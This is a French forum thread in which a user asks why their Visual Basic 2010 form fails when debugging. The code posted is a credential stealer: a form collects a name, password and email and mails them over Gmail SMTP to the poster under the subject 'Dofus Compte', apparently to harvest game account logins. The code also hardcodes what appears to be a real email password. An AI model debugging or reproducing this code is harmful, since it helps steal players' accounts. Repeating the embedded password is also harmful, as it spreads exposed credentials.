Problème microsoft visual basic 2010
Résolu
FragMenteur
Messages postés
8
Membre
Dernière intervention
-
FragMenteur Messages postés 8 Date d'inscription Statut Membre Dernière intervention -
FragMenteur Messages postés 8 Date d'inscription Statut Membre Dernière intervention -
bonjour, j'ai comme vous l'avez compris un probleme au niveau de microsoft visual basic 2010 dans mon codage.
mon problème est que quand je lance le debguage et que je rempli mon formulaire et clic sur continuer je suis automatquement renvoyer sur mon codage et on m'affiche ceci :
voici ma config :
mon problème est que quand je lance le debguage et que je rempli mon formulaire et clic sur continuer je suis automatquement renvoyer sur mon codage et on m'affiche ceci :

voici ma config :
Imports System.Net.Mail Public Class fsf Private nom As String Private pass As String Private mail As String Private message As String Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() Dim SMTPServer As New SmtpClient("smtp.gmail.com") nom = tbnom.Text pass = tbpass.Text mail = tbmail.Text message = "nom : " & nom & vbNewLine & "pass : " & pass & vbNewLine & "mail : " & mail MyMailMessage.From = New MailAddress("jules.youtube@gmail.fr") MyMailMessage.To.Add("jules.youtube@gmail.fr") MyMailMessage.Subject = ("Dofus Compte") MyMailMessage.Body = (message) SMTPServer.Port = ("587") 'Port SMTPServer.Credentials = New System.Net.NetworkCredential("jules.youtube@gmail.fr", "ferrari458JW") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) 'Envoi End Sub End Class
A voir également:
- Problème microsoft visual basic 2010
- Microsoft office - Guide
- Microsoft money - Télécharger - Comptabilité & Facturation
- Cette technique secrète permet d'avoir Windows et Microsoft Office gratuitement et à vie - Accueil - Bureautique
- Microsoft 365 basic - Accueil - Microsoft Office
- Visual basic - Télécharger - Langages